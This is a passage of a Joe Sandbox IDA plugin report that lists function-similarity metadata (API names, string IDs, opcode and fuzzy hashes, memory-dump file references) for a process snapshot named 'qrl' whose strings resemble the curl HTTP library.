                                                                                                                                                                                                                                                            • API String ID: 2091720637-2544594439
                                                                                                                                                                                                                                                            • Opcode ID: 2eebf3fdedc27b001ea852d94590d05781c5eff6512276d2fc9971a0faf72b95
                                                                                                                                                                                                                                                            • Instruction ID: aae0ba2dded1a49f0df531514eea26c1c4e7d1516a96091cf8a2aa6958140234
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2eebf3fdedc27b001ea852d94590d05781c5eff6512276d2fc9971a0faf72b95
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3F184B0614212AFEB109F29DD85A5677B4BF44308F0C4538FD0AC6262E775F8B4CBA6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _errno
                                                                                                                                                                                                                                                            • String ID: $$-
                                                                                                                                                                                                                                                            • API String ID: 2918714741-1949469437
                                                                                                                                                                                                                                                            • Opcode ID: fa32aa11e73a4cf59672042418af996aee801304ed5de15bbe94572be34807f2
                                                                                                                                                                                                                                                            • Instruction ID: 2bc2503cd9d15ff4a1a948beb10909202e2453fb91f83d328acc6d4a30fcedc6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa32aa11e73a4cf59672042418af996aee801304ed5de15bbe94572be34807f2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA61C3706083418FC714AF69C8802AFFBDAABD5354F144A2FE895C7391EA78DC41C76A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strchrstrlen$memcpymemsetrealloc
                                                                                                                                                                                                                                                            • String ID: Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':$proxy
                                                                                                                                                                                                                                                            • API String ID: 3824604658-3942158630
                                                                                                                                                                                                                                                            • Opcode ID: a672ad5fbc14b1d931bb9d2561f9cd6c12579ea6b1e0974c95447df16407f590
                                                                                                                                                                                                                                                            • Instruction ID: a0d50254b7696205e95a522907f50a702200e514ed4a7f09038ee82b66874e26
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a672ad5fbc14b1d931bb9d2561f9cd6c12579ea6b1e0974c95447df16407f590
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 553159F6E042006BD725AA25AC41B9737CC8F95348F080479FD88C7241F6B5ED1083B2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strrchr$free$strlenstrstr
                                                                                                                                                                                                                                                            • String ID: %s%s$%s/%s$://
                                                                                                                                                                                                                                                            • API String ID: 3975967694-3147304931
                                                                                                                                                                                                                                                            • Opcode ID: 7bd204b8ddd25d96890d61b8b2b06f410498c448ec809f8da7fe62ec416703f0
                                                                                                                                                                                                                                                            • Instruction ID: a0e07b32eb198c2863c62855702b2ecdbcdd117675ba81f376bb758c1739fec7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bd204b8ddd25d96890d61b8b2b06f410498c448ec809f8da7fe62ec416703f0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A11B4E2E102052BEF1525272C43F6BB19C8FA0355F05057FFD09C2282FA66DD2945B6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: .gif$.htm$.html$.jpeg$.jpg$.pdf$.png$.svg$.txt$.xml
                                                                                                                                                                                                                                                            • API String ID: 39653677-1880009484
                                                                                                                                                                                                                                                            • Opcode ID: 2555bd15d511455a53dc7a0b12f54569fac50765102287dc0d784c7e84cf48af
                                                                                                                                                                                                                                                            • Instruction ID: 3496c97f7e960ee9cd2cd970c3dd8c8c60b9293460e7deffb5ea5f1151d9d176
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2555bd15d511455a53dc7a0b12f54569fac50765102287dc0d784c7e84cf48af
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721AC96B3020333F614FD237C66B3A608D47957A6F16103EFD05A9382F5698B38467D
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • A specified range MUST include at least one dash (-). Appending one for you!, xrefs: 002365C8
                                                                                                                                                                                                                                                            • %I64d-, xrefs: 002365E4
                                                                                                                                                                                                                                                            • unsupported range point, xrefs: 00238EB6
                                                                                                                                                                                                                                                            • Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain., xrefs: 00236D63
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _errno_strdupfree$strchr
                                                                                                                                                                                                                                                            • String ID: %I64d-$A specified range MUST include at least one dash (-). Appending one for you!$Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain.$unsupported range point
                                                                                                                                                                                                                                                            • API String ID: 2455603386-1864133270
                                                                                                                                                                                                                                                            • Opcode ID: 4fd9ba684c94b3f44d5646a53557e7b1da10f578e3d131ed45daebfc7b639b00
                                                                                                                                                                                                                                                            • Instruction ID: ba56361967fba1007b9ffac93ec6a399c41c29006f7097604cb0523e0b530ea1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fd9ba684c94b3f44d5646a53557e7b1da10f578e3d131ed45daebfc7b639b00
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D4124F0A243429BDF15DF24EC42BAA77A9AF40348F040479F8859B182E775D931CB67
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$fclose
                                                                                                                                                                                                                                                            • String ID: P"-
                                                                                                                                                                                                                                                            • API String ID: 2681820439-2100482176
                                                                                                                                                                                                                                                            • Opcode ID: fcac6ca92259736d04852ebc883db10cdfe34220d879edb24e0dfe7daa2cc65d
                                                                                                                                                                                                                                                            • Instruction ID: 6b122e65ede9c6d3be8298030a19722662401d75db7e6ff239070005e9ce3576
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcac6ca92259736d04852ebc883db10cdfe34220d879edb24e0dfe7daa2cc65d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2315CF1A143808BEF289F11D845B5BF7E5AF90308F04487DE89A57291E775E828CB53
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$_strdupfclosefopenstrcmp
                                                                                                                                                                                                                                                            • String ID: <stdin>$@$Failed to read %s
                                                                                                                                                                                                                                                            • API String ID: 4127137438-3931557418
                                                                                                                                                                                                                                                            • Opcode ID: 8da33a1ab60d6534933538b2a083fba6eb0df4de88fa1e08ba71497770c6095a
                                                                                                                                                                                                                                                            • Instruction ID: e6ff081649a5a18acadd82ac042c07a016d38dca3b3d00702fe1ae4f7269670c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8da33a1ab60d6534933538b2a083fba6eb0df4de88fa1e08ba71497770c6095a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131F3F19242059FDB119F14DC45B6AB3E5AF80304F244466F8455B281EB79DC318757
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Refusing to overwrite %s: %s, xrefs: 00232559
                                                                                                                                                                                                                                                            • Failed to create the file %s: %s, xrefs: 002325CC
                                                                                                                                                                                                                                                            • Remote filename has no length!, xrefs: 00232560
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fopenstrerror$_errnofclose
                                                                                                                                                                                                                                                            • String ID: Failed to create the file %s: %s$Refusing to overwrite %s: %s$Remote filename has no length!
                                                                                                                                                                                                                                                            • API String ID: 729476436-2765071892
                                                                                                                                                                                                                                                            • Opcode ID: b7429a178c15b1b3488e6cd9e992b1d3e7a4b4bff3905a0423a8cd868f7b836e
                                                                                                                                                                                                                                                            • Instruction ID: c6709ae0215f1ee5780fb995c60e78e91c102d9b2ed4834bcadf0eabadeeac95
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7429a178c15b1b3488e6cd9e992b1d3e7a4b4bff3905a0423a8cd868f7b836e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D811B7F5910201BBE7046F25DC15B4777A4EF40308F54002AE80457642F7F9F6A8CBE6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strcmp
                                                                                                                                                                                                                                                            • String ID: 1.0$1.1$1.2$1.3$default
                                                                                                                                                                                                                                                            • API String ID: 1004003707-1496453511
                                                                                                                                                                                                                                                            • Opcode ID: 159e255291c29a7a65fa30b9a3a096473270086fb7702e9a92c0274f3702029b
                                                                                                                                                                                                                                                            • Instruction ID: 14032f20b7d5343443220afe51cc60ef08536be6c22cfc8896b4deb301f54c60
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 159e255291c29a7a65fa30b9a3a096473270086fb7702e9a92c0274f3702029b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A01D6E1F2661213DF5969397D227DE11849F45301F0404BBFC04E23D1FA5DCE6641A9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strtok$fclosefopenfreestrcmp
                                                                                                                                                                                                                                                            • String ID: Failed to open %s!$p
                                                                                                                                                                                                                                                            • API String ID: 2714433378-325265304
                                                                                                                                                                                                                                                            • Opcode ID: 32d8c4c6469ed58f43694e78ef3338de669a611eeadcab9a10426739800204a0
                                                                                                                                                                                                                                                            • Instruction ID: 7876ccc9bf65a77335f2784a53c2ff9fc6144414e7caf4f9179ae4893a851c7f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32d8c4c6469ed58f43694e78ef3338de669a611eeadcab9a10426739800204a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E231F7F2A28302ABDB519E24DC45B6B73E59FC0344F144829F84997191FB75DC25C762
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • nghttp2_session_mem_recv() failed: %s(%d), xrefs: 0025023D
                                                                                                                                                                                                                                                            • nghttp2_session_set_local_window_size() failed: %s(%d), xrefs: 002501B5
                                                                                                                                                                                                                                                            • nghttp2_session_upgrade() failed: %s(%d), xrefs: 002500C2
                                                                                                                                                                                                                                                            • nghttp2_session_send() failed: %s(%d), xrefs: 0025032D
                                                                                                                                                                                                                                                            • nghttp2_submit_settings() failed: %s(%d), xrefs: 00250155
                                                                                                                                                                                                                                                            • connection buffer size is too small to store data following HTTP Upgrade response header: buflen=%zu, datalen=%zu, xrefs: 002501D6
                                                                                                                                                                                                                                                            • http/2: failed to set user_data for stream %d!, xrefs: 0025017E
                                                                                                                                                                                                                                                            • Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=%zu, xrefs: 002501E1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=%zu$connection buffer size is too small to store data following HTTP Upgrade response header: buflen=%zu, datalen=%zu$http/2: failed to set user_data for stream %d!$nghttp2_session_mem_recv() failed: %s(%d)$nghttp2_session_send() failed: %s(%d)$nghttp2_session_set_local_window_size() failed: %s(%d)$nghttp2_session_upgrade() failed: %s(%d)$nghttp2_submit_settings() failed: %s(%d)
                                                                                                                                                                                                                                                            • API String ID: 0-1573709828
                                                                                                                                                                                                                                                            • Opcode ID: 3df0189c8b2db3de758199de3731e2a946a7c6a1891f9be52e025dac95dfe9ea
                                                                                                                                                                                                                                                            • Instruction ID: 0856f7c357dc9f952389ad04e70238334ddd9c58099256debeb6cade11bba0d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3df0189c8b2db3de758199de3731e2a946a7c6a1891f9be52e025dac95dfe9ea
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A881A3B1A10645AFEB24AF10DC81BEB77A9FF44305F044165FC4C8B252EB71AA64CF96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strchr$strrchr$memcpystrlenstrstr
